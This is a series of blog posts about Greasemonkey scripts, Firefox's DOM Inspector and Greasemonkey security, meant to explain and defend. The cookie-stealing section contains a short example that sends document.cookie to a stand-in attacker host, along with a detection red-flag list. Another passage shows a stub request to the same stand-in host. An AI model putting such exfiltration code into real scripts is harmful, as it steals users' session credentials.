
Adding the Titles of Videos to Embedded YouTube Videos

During and after writing each of my Greasemonkey scripts, I look for ways to improve them. I often have ideas for adding features and for making the scripts more efficient, and when I consider an improvement a high enough priority, the script gets updated.

Recently, an event made one of those updates a priority. I had considered adding the titles of embedded YouTube videos to the links that one of my scripts adds below those videos. In addition to being able to visit the video's page on YouTube, one may want to know the title of an embedded video before playing it. And after a user requested this feature, updating the script became my new highest priority.

I originally had this idea when I found out about a script that adds video titles to links to YouTube videos. I thought making that script available was a very good idea, and it has been downloaded and installed many times. It could be used alongside my script to display the titles of embedded videos. However, I have found that it does not always add titles to the links my script adds. I would also prefer to have this functionality in my own script, to save users the trouble of looking for another one.
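The core of such a feature can be sketched in a few lines. This is a minimal illustration, not my script's actual code: it assumes Greasemonkey's GM_xmlhttpRequest function is available, that the link element already points at the video's watch page, and that the page's title element contains the video title (the extractTitle helper is illustrative).

```javascript
// Pull the contents of the <title> element out of a fetched watch page.
function extractTitle(html) {
  var match = html.match(/<title>([\s\S]*?)<\/title>/i);
  if (!match) return null;
  return match[1].replace(/\s+/g, ' ').trim(); // collapse whitespace
}

// In a Greasemonkey context, fetch the watch page the link points to
// and append the video's title to the link text.
function addTitleToLink(link) {
  GM_xmlhttpRequest({
    method: 'GET',
    url: link.href,
    onload: function (response) {
      var title = extractTitle(response.responseText);
      if (title) link.textContent += ' (' + title + ')';
    }
  });
}
```

Each title costs one extra HTTP request per embedded video, which is exactly the overhead discussed below.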

A drawback of adding this functionality is that it is a feature some might not want. Some may not want the overhead of the HTTP requests made to retrieve video titles, and some may simply find the feature unnecessary. Many may also already have the title-adding script I mentioned, in which case my script might add a video title a second time. For these reasons, I added an option for toggling whether video titles are displayed. Below is a link to a screen shot of a web page on which the script is running, with the option to not display video titles visible.
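A toggle like this typically combines GM_getValue/GM_setValue with a menu command. The sketch below is an assumption about how it could be wired up (the 'showTitles' key name is illustrative), with an in-memory fallback so the logic also runs outside the browser:

```javascript
// Settings adapter: use Greasemonkey's GM_getValue/GM_setValue when
// available, otherwise fall back to a plain object.
var fallback = {};

function getSetting(key, def) {
  if (typeof GM_getValue === 'function') return GM_getValue(key, def);
  return (key in fallback) ? fallback[key] : def;
}

function setSetting(key, value) {
  if (typeof GM_setValue === 'function') GM_setValue(key, value);
  else fallback[key] = value;
}

// Flip the stored preference and return the new state.
function toggleTitles() {
  var next = !getSetting('showTitles', true);
  setSetting('showTitles', next);
  return next;
}

// Expose the toggle in Greasemonkey's User Script Commands menu.
if (typeof GM_registerMenuCommand === 'function') {
  GM_registerMenuCommand('Toggle video titles', toggleTitles);
}
```

The script would then consult getSetting('showTitles', true) before fetching any titles; as noted later in this entry, the page currently has to be refreshed for a change to take effect.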

I wanted this updated version of the script to be available as soon as possible, so I looked for answers to my questions in code that already existed. Some of the code in my script is quite obviously based on the script that adds the titles of YouTube videos to links. I also referred to this page on the GreaseSpot wiki when adding the option for toggling whether video titles are included in these links. I often prefer to solve problems on my own, although this time, doing so without referring to existing code would likely have been reinventing the wheel. It was also requested that I add these links to embedded videos blocked by the NoScript Firefox extension, which my script did not previously do; for that part, I did not look up any answers.

I would like to know about any issues this new version of the script has. It worked well in my tests, although there may be instances in which it does not work properly. I am also always interested in suggestions for improving the script. For example, the page must currently be refreshed for a change to the title-display setting to take effect; some might prefer that the page refresh automatically after the setting is changed, and some may have other suggestions for improvements. It was a suggestion that led to this improvement, so if you have ideas for improving the script further, I would like to hear them. Scripts such as these are for users like you, and it is your suggestions that make me more likely to continue improving them.

Installing Firefox’s DOM Inspector After Not Installing It Initially

After getting my computer back from being serviced, I needed to download and install the applications I use. I was initially pleased to see that the first application I would have installed, the Mozilla Firefox web browser, was already there. However, I was not pleased to see that the DOM Inspector was not installed with it. According to the MozillaZine Knowledge Base article on the DOM Inspector, on the operating system I use it can only be installed when Firefox is first installed. Unfortunately, I only discovered the extension was missing after installing many other Firefox extensions and bookmarking many pages, so uninstalling and reinstalling Firefox was not something I wanted to do. There had to be a way to install this extension, on which I often rely, without reinstalling Firefox. So I searched the web for a method of installing the DOM Inspector after Firefox was installed, as I knew one had to exist.

I wanted the DOM Inspector installed as soon as possible; I needed it at the time, and I had already waited long enough while my computer was being serviced. So I followed the first set of instructions I found on installing the DOM Inspector this way, and afterwards I was once again able to use it. Still, I had to wonder whether there was a better method of installing it with Firefox already installed. Starting the Firefox installation again, copying files from a temporary location, and then canceling the installation seemed more complicated than necessary. Later on, I did find a better way, which, coincidentally, was mentioned in the comments section of the blog post containing the instructions I had followed.

It was when I upgraded to Firefox 2.0.0.13 that I needed to rediscover how to install the DOM Inspector this way. Every other Firefox extension I had was considered compatible with the newer version of Firefox except the DOM Inspector. I found that the reason it was considered incompatible was a single line in its install.rdf file, which indicated that the last Firefox version with which the extension was compatible was 2.0.0.12. So I once again needed to find out how to reinstall the DOM Inspector, as I did not recall all the details of installing it while Firefox was already installed. That was when I came across this set of instructions, which I found more straightforward and less unwieldy than the ones I had previously followed: use 7-Zip to open the Firefox setup file, copy the DOM Inspector's contents to another folder, create an archive (with a file extension of .XPI) of those contents, and install the extension using that archive. Opening the setup file with an archiver was something I had never thought of doing, likely because I was too busy with other work. However, I also decided to do something else to avoid having to install this extension again for as long as I use Firefox 2.

I did not want to go through this process after each Firefox update, and I thought there had to be a better way of keeping the DOM Inspector installed once it was installed this way. I should not have to repeat the process simply because of a decision made when Firefox was installed; those who chose to install the extension initially do not need to, so why should I? To create the illusion that the DOM Inspector had been installed along with Firefox, I added the step of modifying the maxVersion property in the DOM Inspector's install.rdf file so that it would work with subsequent versions of Firefox. I tested this by uninstalling the DOM Inspector, then reinstalling it using the instructions previously mentioned, but with a setup file for an older version of Firefox. I found that after making the correct modification to install.rdf before creating the archive, the extension could be installed and would work with the newer version.

A guide to the entire process of installing the DOM Inspector with Firefox already installed is one that many might find useful. Therefore, a step-by-step how-to guide for doing this should be easily accessible. So I decided to include step-by-step instructions to follow for installing the DOM Inspector this way. I aspire to make this the kind of guide that I would have liked to have had when I decided that I needed the DOM Inspector without having to reinstall Firefox. And so below, I outline the process of installing the DOM Inspector after Firefox is installed, without having to go through certain installation or reinstallation processes again.

  1. Download the Firefox setup file. All you need to do is visit www.getfirefox.com and then click the link to download this setup file.
  2. Go to the directory to which this setup file was downloaded.
  3. Then use file archiving software to view the contents of the setup file. 7-Zip, which can be downloaded from here, is software I would suggest for completing this task.
  4. By using this file archiving software, go to the directory titled optional, and then go to the directory titled extensions. You will then see a directory titled inspector@mozilla.org, which you can copy to a location of your choice.
  5. Then go to the location to which you copied this directory, and then open this inspector@mozilla.org directory.
  6. This step is optional, and can be skipped if you only need a short-term solution to the problem of not having the DOM Inspector installed. Open the install.rdf file and look for the <em:maxVersion> element. The version number of the Firefox release you downloaded will be listed there, and you may change it so that the extension will work with future versions of Firefox. I changed this version number to 2.*.*.* so that I should not need to reinstall the DOM Inspector for as long as I use Firefox 2. The reason I chose this version number will be made clearer later in this entry.
  7. Use file archiving software such as 7-Zip to add the contents within the inspector@mozilla.org directory to a ZIP archive, although you will need to ensure that the archive has .XPI as its extension.
  8. Go back into Firefox. Then open this newly-created archive by entering the path to the archive in the address bar, or through another method of your choice. You will then be able to install the extension as you normally would. Therefore, you will then need to restart Firefox, and then you should be able to use the extension.
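For step 6 above, the edit amounts to changing one element in install.rdf. A trimmed sketch of the relevant part of the file is shown below; the element names follow the install manifest format, while the version values shown are illustrative:

```xml
<em:targetApplication>
  <Description>
    <!-- Firefox's application ID -->
    <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
    <em:minVersion>2.0</em:minVersion>
    <!-- Raised from the single 2.0.0.x release it originally named -->
    <em:maxVersion>2.*.*.*</em:maxVersion>
  </Description>
</em:targetApplication>
```

Make this change before creating the .XPI archive in step 7, so the archived install.rdf carries the new maxVersion.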

It may not be long before this set of instructions is considered obsolete. Firefox 3 will soon be released, and the DOM Inspector will not be included with it; instead, when one wants to use it, one can simply download and install it, as it is already available here. In fact, although Firefox 3 Beta 5 is said to be for testing purposes only, quite a few people are already using it regularly, likely because it can be used without losing many extensions or configuration settings, according to this Lifehacker article. Many are also using Firefox 3 Beta 5 simply because it is already considered quite an improvement over Firefox 2. However, if you prefer to use Firefox 2 for now and need the DOM Inspector after initially choosing not to install it, there is a way to install it. And if you can think of a better solution to this problem than the one I suggest here, I encourage you to share it.

Facilitating the Analysis of Data Sent Via Web Forms

After writing three consecutive entries here about Greasemonkey’s past and present security issues, I wanted to write about a different topic. I was actually fine with making Greasemonkey the topic once again, although this time, I preferred to emphasize the reasons to use it, rather than the reasons one may want to avoid it. I also wanted to write about topics other than Greasemonkey, as the percentage of posts about Greasemonkey on this blog is currently greater than I would like it to be. I aspire to make this blog about a somewhat more diverse group of topics, and so I decided to make this entry about webbots and automated form submission. And so it was time for a break from posts about Greasemonkey. Or so I thought.

I have recently been reading a book titled “Webbots, Spiders, and Screen Scrapers: A Guide to Developing Internet Agents with PHP/CURL” by Michael Schrenk. And as I read through it, I came up with a few ideas for PHP/CURL projects. And even though none of the ideas for projects that I currently have involve automated form submission, I find the topic of automated form submission interesting. So I read through the chapter on this topic, and I found the examples of how to use the code available through the book’s website quite interesting. However, what I found more interesting and more important were explanations of what needs to be considered when writing code that automates form submission.

That chapter of the book notes how important it is that the data a form-submitting webbot sends be what the receiving server expects. One can look through a page's source to discover what data a form sends. However, that approach is inefficient: it is time-consuming, and it may not reveal all of the data that gets sent to the web server through the form. Fortunately, the book's website includes a page that, when form data is sent to it via HTTP GET or POST, displays the data it received. This page, which shows variable names and values among other useful data, gives developers a much more efficient way of seeing exactly what a form sends.

Although the data displayed on this page is useful for developers of form-submission webbots, the suggested method of using the page is not convenient. To use it, the action attributes of the <form> tags of the forms to be analyzed need to be replaced with the URL of the analysis page. Schrenk therefore suggests saving a copy of the page one is working on to the local hard drive, modifying its source to change these attributes, and then opening the saved, modified page in a web browser. Only after all of these steps are completed can one enter data into a form and have it sent to the page that displays it.

There must be a better way, a more efficient way, an automated way, of updating these attributes than the process outlined above. And doesn't automating attribute changes sound like a job for a Greasemonkey script?

As anyone who knows what Greasemonkey can do is aware, a Greasemonkey script consisting of only a few lines of JavaScript can change the attributes of every form on a page automatically. So I took the few minutes needed to write one. I set it to work on all web pages, and so I keep it disabled most of the time, as I usually want form data to go to its intended destination. One could instead configure the script to work only with certain pages, as one is likely only interested in the form data sent from a few of them. This script is unusual in that it almost certainly requires some configuration by the user, and in that it may be disabled most of the time. However, it performs its intended task where and when that task needs to be performed.
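The few lines in question look roughly like this. This is a sketch of the idea rather than my script's exact code, and the analysis URL is a placeholder to be replaced with the address of the book's form-analysis page or of your own echo script:

```javascript
// Rewrite every form's action attribute so submitted data goes to an
// analysis page instead of the form's real destination.
// ANALYSIS_URL is a placeholder, not a real endpoint.
var ANALYSIS_URL = 'http://www.example.com/form_analyzer.php';

function redirectForms(forms, url) {
  var count = 0;
  for (var i = 0; i < forms.length; i++) {
    forms[i].action = url; // the data will be displayed, not processed
    count++;
  }
  return count; // how many forms were rewritten
}

// In a Greasemonkey context, apply it to the live page's forms.
if (typeof document !== 'undefined') {
  redirectForms(document.forms, ANALYSIS_URL);
}
```

With the script enabled, submitting any form on the page sends its data to the analysis page, with no saving or hand-editing of the page required.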

If you have Greasemonkey installed, you can install this script by clicking here. One might measure the success and usefulness of a Greasemonkey script by the number of times it is installed from a site such as Userscripts.org, and by that measure this script may not be considered very successful or useful at all. However, it is there for those who would like to use it, and some might be interested in it. After focusing on malicious scripts, I thought it would be appropriate to focus on a script that is beneficial and cannot be malicious, even if it may not be the most useful script. And because I want to emphasize Greasemonkey's benefits and usefulness in this post, I'll end it with an amusing and entertaining video that explains how Greasemonkey can be useful.

Greasemonkey and Security: Attempting to Summarize What You Need to Know (Part 3 of 3)

The first entry in this series on Greasemonkey and security covered the security issues Greasemonkey has had in the past. The second part covered the most recent security issues inherent to Greasemonkey itself. In this third and final part, the topic is the issues with the scripts Greasemonkey runs, which are issues Greasemonkey has had and may always have.

As you probably know if you are reading this, Greasemonkey is a powerful tool that allows its users to do to web pages everything that can be done with JavaScript, and it has abilities beyond those JavaScript usually has. As was said before, the features that allow Greasemonkey scripts to do what ordinary JavaScript cannot can lead to security issues. Many Greasemonkey scripts pose no security risk; ones that simply make slight adjustments to pages, such as removing page elements, are harmless. However, there are also many more useful and powerful scripts that showcase Greasemonkey's advanced features, and those same features that make Greasemonkey so powerful also give its scripts the ability to perform malicious activity.

The source code of Greasemonkey scripts can be viewed by anyone who wants to see it, so anyone intending to do something malicious with a script cannot easily hide that fact. There are a few things one can look for in a script's source to judge whether it may be malicious. For example, one can get an idea of what data the script sends via the GM_xmlhttpRequest function, and can see whether the document.cookie property is being used. However, both GM_xmlhttpRequest and document.cookie have non-malicious uses, and determining whether a script is malicious is not always easy. The number of Greasemonkey users who know what to look for in these scripts may not be known, although it does seem that many would install scripts without knowing everything those scripts do.

For some time on Userscripts.org, each page displaying information about a particular script carried a banner warning users about the possibility of scripts "stealing" cookies. The warning also linked to a discussion thread that had been ongoing for several months, in which users of Userscripts.org discussed the implications of these security issues. Topics raised there included the red flags one should watch for when viewing a script's source code, as well as possible solutions to these issues. The thread has also been a place where requests have been made to review or remove scripts that may be malicious. It is a long thread in which many ideas and concepts are mentioned, and as I did in the two previous entries on this topic, I will attempt to summarize what is most important to know about this Greasemonkey security issue.

The issue of what to look for in these scripts needs to be mentioned, but first, a security issue often associated with JavaScript. Much has been said about the possibility of cross-site scripting (XSS) attacks when JavaScript is used, and in one kind of XSS attack, cookies can be stolen through the document.cookie property. This is a serious issue, as the data in cookies, which may include a user's authentication credentials, can be sent to another domain. An example of how this cookie-stealing XSS attack could be carried out can be found here. In a similar attack, Greasemonkey scripts can be used to acquire the data stored in cookies. When viewing a script's source code, one can check whether information read from cookies is sent to another website as a parameter in that site's URL. Data in cookies could also be transmitted to any site on the web via the GM_xmlhttpRequest function. Code like this can often be noticed fairly easily; still, a number of cookies may have been successfully stolen via scripts downloaded from Userscripts.org and other sites that host Greasemonkey scripts.
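The cookie-in-a-URL-parameter pattern a reviewer would look for is small enough to show directly. This is a deliberately simplified illustration of the pattern, not code from any real script, and the domain is a placeholder, not a real collection endpoint:

```javascript
// The core of a cookie-stealing script: the page's cookie jar is
// appended as a parameter to a URL on a server the attacker controls.
function buildExfilUrl(cookie) {
  return 'http://attacker.example/collect?c=' + encodeURIComponent(cookie);
}

// In a page or user-script context, the send can be as small as
// requesting an image, which quietly makes the HTTP request:
if (typeof document !== 'undefined' && typeof Image !== 'undefined') {
  new Image().src = buildExfilUrl(document.cookie);
}
```

Seeing document.cookie concatenated into a foreign URL, whether fetched via an image, a script element, or GM_xmlhttpRequest, is exactly the red flag described above.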

When an issue such as this occurs, solutions need to be suggested so that they can be implemented. One set of possible solutions involves what script-hosting sites such as Userscripts.org can do. Userscripts.org already has a comments section for each script, as well as the discussion thread in which issues with scripts can be raised. However, providing information this way may not keep more casual Greasemonkey users from installing malicious scripts before it is too late. Not all Greasemonkey users know what to look for, and only those with the time and ability to look through scripts for malicious code can report scripts that contain it. It may be true that, given enough eyeballs, security issues with Greasemonkey scripts could be shallow. But how can one know whether enough eyeballs have examined a script's code to determine whether it poses a security risk?

Some would say that the best way to address this issue with Greasemonkey scripts is with another Greasemonkey script. I actually considered writing a script that could automatically tell whether there was anything in a script's source that could lead to problems. However, one user already wrote a similar script, titled "Screen Userscripts", which can be found here. It should be mentioned that this script may not catch every malicious script. For example, there have apparently been scripts that use code obfuscation to hide the fact that they access document.cookie, and obfuscated code is not something this script detects. Use of obfuscation could itself be considered a red flag, and the script could be updated to look for it, along with many other red flags a similar script could find. Even the use of TinyURL.com in a script's source could be considered characteristic of a script that cannot be trusted. Script-screening scripts may never flag every malicious script, as some authors will always try to get their code past any filter. However, a sufficiently large community of users looking into this issue would minimize the number of scripts that could do anything malicious.
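A naive red-flag scanner in the spirit of that idea might look like the sketch below. To be clear, this is not the "Screen Userscripts" script's actual code, and the flag list is illustrative. Because it only does substring checks, obfuscated code sails right past it, which is precisely the limitation described above:

```javascript
// Strings whose presence in a script's source warrants a closer look.
// None of these proves malice; all have legitimate uses.
var RED_FLAGS = [
  'document.cookie',   // cookie access, the focus of the recent concern
  'GM_xmlhttpRequest', // can send data to any site on the web
  'tinyurl.com',       // shortened URLs hide the real destination
  'eval('              // a common building block of obfuscation
];

// Return the subset of RED_FLAGS that appear in the given source text.
function findRedFlags(source) {
  var lower = source.toLowerCase();
  return RED_FLAGS.filter(function (flag) {
    return lower.indexOf(flag.toLowerCase()) !== -1;
  });
}
```

A screening script would run a check like this over a script's source before installation and present the matches to the user for judgment, since, as noted above, flagged constructs often have non-malicious uses.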

It has also been suggested that updates be made to Greasemonkey itself. Some have suggested that Greasemonkey disallow scripts from accessing document.cookie, in much the same way that the GM_xmlhttpRequest function only allows the HTTP, HTTPS, and FTP protocols. However, that would break a number of non-malicious scripts. This tradeoff between security and functionality is one Greasemonkey has always faced and may always face. As long as Greasemonkey can do everything JavaScript can do and more, it could be considered a security risk: what appears to be Greasemonkey's greatest selling point is also its most serious security issue.

In this series of entries, I have tried to summarize what Greasemonkey users should know. I may not have covered everything that could (and perhaps should) have been covered; some might say I have left out important information, even though what I have written spans three rather long blog posts. There might also be other Greasemonkey security issues not yet known, as was the case with the recent issues found by Anthony Lieuallen that were mentioned in the second part of this series. This is certainly not the last word on Greasemonkey and security, and more will be posted on this topic in the future; in fact, I have considered writing a summary of this summary that has taken up three blog posts. Greasemonkey has been referred to as a Firefox extension to avoid, as you can see if you read this article. However, as that article said, it is one to avoid only if you are not willing to do your homework, and anything that makes that homework easier should be made available. Greasemonkey is meant for those who are knowledgeable about topics such as JavaScript and security, so I encourage those who want to use it to be knowledgeable about those topics. If you know the risks and rewards that come with using Greasemonkey, you should be able to enjoy the rewards without taking unnecessary risks.

Greasemonkey and Security: Attempting to Summarize What You Need to Know (Part 2 of 3)

The previous entry in this series on Greasemonkey and security gave an overview of the history of Greasemonkey security and explained why that history matters now. This entry covers the most recent security issues Greasemonkey has had. As mentioned last time, security fixes in the latest release, version 0.7.20080121.0, caused some Greasemonkey scripts to stop working; the affected scripts are among those that use Greasemonkey's API functions together with the unsafeWindow variable. As was said last week, scripts that use functions defined on the remote page (accessed through unsafeWindow) can be vulnerable to hostile pages. However, it recently became apparent that using this variable makes scripts even more vulnerable than previously thought. The new version of Greasemonkey attempts to make scripts that use unsafeWindow somewhat less vulnerable to hostile remote-page code, and this new version and the issues it addresses are this entry's topic.

In the last entry, it was noted that any script using functions or properties of the unsafeWindow or unsafeDocument variables should not be trusted, as the remote page can redefine whatever is accessed through them. However, the remote page redefining what is accessed through unsafeWindow appears to be only one of the risks of using it. The last entry also emphasized the importance of Greasemonkey keeping remote pages from using its API functions. One might therefore suspect that using both unsafeWindow and these API functions in the same script could lead to very serious security issues, and it has recently been found that this is the case. One individual set out to find exactly how unsafe unsafeWindow actually was, and determined that some scripts that use unsafeWindow together with Greasemonkey's API functions could give the remote page access to those API functions.

This security issue was said to have been publicly disclosed, yet I had some difficulty finding information about it through Google searches. I later discovered that I needed a different Google service: it was in posts on the greasemonkey-dev group on Google Groups that I found what I was looking for. In this discussion on greasemonkey-dev, it was said that when unsafeWindow is used, the remote page can mount a privilege escalation attack that gives its code access to Greasemonkey's API functions. News of this kind of attack was apparently broken there, and in that thread one can see that it was the individual who set out to demonstrate why unsafeWindow is unsafe who discovered the flaw.

Proof-of-concept code can definitely help support claims about security flaws, and the individual who discovered this one wrote such code, in the form of the JavaScript on this page and a Greasemonkey script to use with that page. The script uses the GM_setValue API function to store a value in the browser, then calls a function on the page through unsafeWindow. Viewing the page's source, one can see how the page tries to gain access to whatever called the function, in an attempt to reach GM_setValue. When using the script with the page, one sees the value stored in Firefox's settings before and after the call to the remote page. With earlier versions of Greasemonkey, the stored value shown in a pop-up window differs after the function call, indicating that the remote page successfully gained access to GM_setValue and used it. With the new version of Greasemonkey, the page's attempt to change the stored value fails. The new version therefore addresses this privilege escalation issue, and the importance of upgrading becomes apparent when using the script with the different versions. It should also be noted that the issue did not occur when tested with the previous version of Greasemonkey on Firefox 3 Beta 2, so using that version of Firefox is considered one way of avoiding the issue.

The privilege escalation attack demonstrated on that page is only one example of what a remote page could have done when certain scripts were used. The previous entry mentioned the importance of keeping remote-page code away from the GM_xmlhttpRequest function; cross-domain requests were a possibility, as the remote page could obtain references to other API functions in an attack similar to the one carried out by the proof-of-concept code. In addition, it was said on greasemonkey-dev that remote code could have accessed other information, including the source code of the script itself. Considering that sensitive data is sometimes stored in script source code, and in browser settings that should only be accessible to certain Greasemonkey scripts, this was a serious issue, similar to the previous Greasemonkey security issues outlined here. In an exploit like one described in the first part of this series, GM_xmlhttpRequest could then have been used to send the leaked data anywhere on the web. Although scripts could no longer access files on a user's hard drive, this still needed to be addressed: source code leakage and API leakage were found to be possible again, as they were in Greasemonkey 0.3. These issues were on a smaller scale, as far fewer scripts were affected this time, but they were still a problem that needed to be solved.

The fix for this issue came out about a week after the issue was first reported on greasemonkey-dev. The announcement of the new version of Greasemonkey was made here on Greasespot by Greasemonkey creator Aaron Boodman. In the entry on Greasespot that announced this new version, Boodman mentioned the security issues the new version addresses, and that these security fixes result in some scripts not working with it. A link to an article on the Greasespot wiki on the compatibility of scripts with the new version was also in that entry. It is quite important that script authors whose scripts use both these API functions and the unsafeWindow variable refer to that page on the Greasespot wiki, as it mentions a workaround to fix scripts that may be broken. Some might consider themselves inconvenienced by not having their scripts work with the new version of Greasemonkey. However, when using scripts that use the unsafeWindow or unsafeDocument variables, one takes the risk of having these scripts not perform their intended function. And it may be better for them to not work at all than to run the risk of having the remote page code perform malicious activity.

Having said this, the most serious security issues related to Greasemonkey may not be inherent to Greasemonkey itself. Rather, it is certain scripts run through Greasemonkey that can be considered the most serious security-related issues. Greasemonkey makes some attempts at preventing scripts from becoming security issues. However, some scripts need to use variables with names beginning with “unsafe,” and that is a problem for which no easy solutions exist. The new version of Greasemonkey simply tried to make unsafeWindow as unsafe as it was previously thought to be. And then there is the issue of deliberately malicious scripts, such as those that steal cookies. Whether or not Greasemonkey can or should prevent this kind of malicious activity on the part of scripts is debatable. For now, it is still important that scripts be checked to see whether they could intentionally or unintentionally do anything undesired. As I have said before, I had been meaning to write about the scripts themselves, the cookie-stealing ones in particular, for some time. And in the next and final entry in this series on Greasemonkey and security, the topic will be the scripts themselves.

Greasemonkey and Security: Attempting to Summarize What You Need to Know (Part 1 of 3)

As one might expect when I am unable to access the web as often, the inspiration for this entry comes from something I read that was not in electronic form. As I have mentioned previously on this blog, I have taken time to rediscover why I have purchased information in the form of ink on processed tree carcasses. And one such book that I have been reading is one that no one who reads this blog should be surprised I own; it is one that likely occupies the bookshelves of many Greasemonkey coders. This book, titled “Greasemonkey Hacks,” written by Mark Pilgrim and published by O’Reilly Media, contains much information on what can be done with Greasemonkey, the source code of Greasemonkey scripts, and explanations of that source code. It is a book that anyone serious about writing Greasemonkey scripts should at least consider reading.

As one might imagine, much of the information in the book is only useful when one has access to a computer, so that one can work with the example scripts in the book. This book seems to have been designed specifically to sit on a computer desk, likely left open to the last section that a coder using it found interesting. However, some of the information in this book can be read without any need for access to a computer at the time. And one of the “hacks” in the book that can be read with no computer nearby is one that I would say stands out as among the most important in the book. In fact, one might go so far as to say that this hack should be read by anyone serious about writing Greasemonkey scripts that make use of what Greasemonkey has to offer. It is likely for this reason that this hack, titled “Avoid Common Pitfalls,” is freely available online as an article on the O’Reilly Network. That article on O’ReillyNet is actually titled “Avoid Common Pitfalls in Greasemonkey: How the History of Greasemonkey Security Affects You Now.” And here I write about why the latter part of that title is still appropriate.

I had been meaning to write about the security issues that Greasemonkey has and has previously had for some time. In particular, I considered it important to focus on the issue of the “cookie stealing” scripts that are discussed here. However, it was only after reading that previously mentioned section of that previously mentioned book that I decided it would be best to make Greasemonkey and security the next topic of discussion on this blog. I was going to simply write about what Mark Pilgrim wrote, and why it is relevant even two and a half years after it was published. And in one of those coincidences that sometimes occur as I prepare to write an entry, a new version of Greasemonkey was released that addresses publicly disclosed security issues with similarities to the issues mentioned in Pilgrim’s article.

As you may know if you have read Pilgrim’s article, there was a time when Greasemonkey had some very serious security-related issues. The article mentions issues that did not seem to have been considered when Greasemonkey was first written, primarily the issue of “trusting the remote page” on which the scripts are run. Remote pages could have been designed to take advantage of issues that can occur when Greasemonkey scripts are run. It was in this article that it was described how, in Greasemonkey 0.3, a combination of security flaws could have let remote pages read files stored on a user’s hard drive and then forward the contents of those files to any location on the web. In addition, it was said that the possibility of the remote page redefining the DOM functions that scripts use to work with web pages did not seem to have been considered when earlier versions of Greasemonkey were released. Therefore, the remote page had another way of running code to interfere with Greasemonkey scripts, and this was an even more serious issue considering that the code in Greasemonkey scripts could have been captured by the remote page. With information on the scripts being run, it could have been determined which DOM functions used by a script could be redefined to run code interfering with that script.

Then in the article, after these security issues are mentioned, the way in which Greasemonkey was updated in version 0.5 to address them is noted. No longer did this version inject <script> tags into the page, which had triggered DOMNodeInserted events; therefore, the remote page could no longer use these events to tell whether a Greasemonkey script was injected into the page. And Greasemonkey’s API functions (such as GM_xmlhttpRequest), which allow functionality beyond what JavaScript allows, were no longer defined as children of the global window object, where they had been accessible to remote pages. By addressing this issue, remote pages could no longer capture a reference to the GM_xmlhttpRequest function and use it to send any data they could gather to any location on the web; thus, the circumvention of the same-origin policy that JavaScript has as a security feature was addressed. In addition, the window and document objects were redefined as XPCNativeWrappers, so Greasemonkey would not work directly with objects whose methods could be redefined by the remote page. Instead, when a function call needed to be made, it could be made knowing that the function had not been modified by the remote page in an attempt to run arbitrary code. Objects returned by these function calls were also XPCNativeWrappers, and thus could not have their functions or properties redefined by the remote page.
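
The danger of the earlier approach can be sketched in a few lines of plain JavaScript. This is an illustrative stand-in, not Greasemonkey’s actual source code:

```javascript
// An illustrative sketch (not actual Greasemonkey source) of why
// defining API functions as children of the page's global window
// object was dangerous. The object and function below are stand-ins.
const pageWindow = {};

// Pre-0.5 style: the privileged API is visible to page code.
pageWindow.GM_xmlhttpRequest = function (details) {
  // A real implementation would perform a cross-domain HTTP request
  // with the privileges of the extension.
  return "request sent to " + details.url;
};

// Remote page code could simply capture the reference...
const stolen = pageWindow.GM_xmlhttpRequest;

// ...and later use it to send any gathered data anywhere on the web,
// bypassing JavaScript's same-origin policy.
const result = stolen({ url: "http://attacker.example/collect" });
console.log(result); // request sent to http://attacker.example/collect
```

Moving the API out of the page’s reach, as version 0.5 did, closes off exactly this kind of capture.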

In addition, it is said in Pilgrim’s article that there are no easy ways around some issues. One issue for which no suitable workaround exists involves the use of the window and document objects. The unsafeWindow and unsafeDocument variables, which are references to the actual window and document objects respectively, are mentioned. It seems these two variables exist in Greasemonkey because some JavaScript functions on remote pages may need references to the real window or document objects as parameters, and these functions would not accept XPCNativeWrapper objects. Any Greasemonkey script that uses functions or properties of the unsafeWindow or unsafeDocument objects should not be considered secure, as remote pages could redefine these functions and properties. It is for this reason that the article says use of the watch function, which requires use of the unsafeWindow variable, is unsafe in Greasemonkey scripts, as remote page code could redefine that function.
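
A plain JavaScript sketch can illustrate why this is so. The object and function names here are hypothetical stand-ins for real page code:

```javascript
// A hypothetical illustration of why functions reached through
// unsafeWindow cannot be trusted; the object and functions here are
// stand-ins for real page code.
const unsafeWindowStub = {
  getUserName: function () {
    return "actual user";
  },
};

// The remote page may redefine any of its own functions at any time.
unsafeWindowStub.getUserName = function () {
  // Arbitrary page-controlled code now runs in place of the function
  // the script expected to call.
  return "spoofed user";
};

// A script calling the function through unsafeWindow runs the
// replacement without any indication that it changed.
console.log(unsafeWindowStub.getUserName()); // spoofed user
```

With XPCNativeWrapper objects, by contrast, the script can be sure the function it calls is the native one, not a page-supplied replacement.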

The article by Pilgrim also mentions how past security fixes can lead to common pitfalls when writing Greasemonkey scripts, as JavaScript code that would usually be expected to run properly may not work in the context of a Greasemonkey script. Because Greasemonkey scripts run in what is known as a sandbox, and because they work with XPCNativeWrapper objects, some common ways of writing JavaScript code will not work in a Greasemonkey script. There may be more than one way to code a solution to a problem in JavaScript, and it is important to know that there are fewer ways of approaching these problems, and thus limitations on how the JavaScript can be written, when writing Greasemonkey scripts. So when JavaScript that is implemented properly according to reference guides does not work in a Greasemonkey script, the answer to why it does not work may be found in Pilgrim’s article. However, this article may not actually be the best reference guide for such occasions.
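
As an example of such a pitfall, Pilgrim’s article notes that assigning to an element’s on* event handler properties fails silently on wrapped objects, while addEventListener works. The following sketch mimics that behavior with a stub object of my own making, so the contrast can be seen outside the sandbox:

```javascript
// A stub that mimics how an XPCNativeWrapper silently ignores on*
// handler assignments, to contrast the pitfall with the pattern that
// works. The stub is illustrative; real scripts deal with wrapped
// DOM elements.
function makeWrappedElement() {
  const handlers = [];
  return {
    // Like an XPCNativeWrapper, the assignment is silently ignored.
    set onclick(fn) {},
    get onclick() {
      return null;
    },
    addEventListener(type, fn) {
      handlers.push(fn);
    },
    click() {
      handlers.forEach((fn) => fn());
    },
  };
}

const element = makeWrappedElement();
let clicks = 0;

element.onclick = () => {
  clicks += 1;
};
element.click();
console.log(clicks); // 0: the handler assignment had no effect

element.addEventListener("click", () => {
  clicks += 1;
});
element.click();
console.log(clicks); // 1: addEventListener is the pattern that works
```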

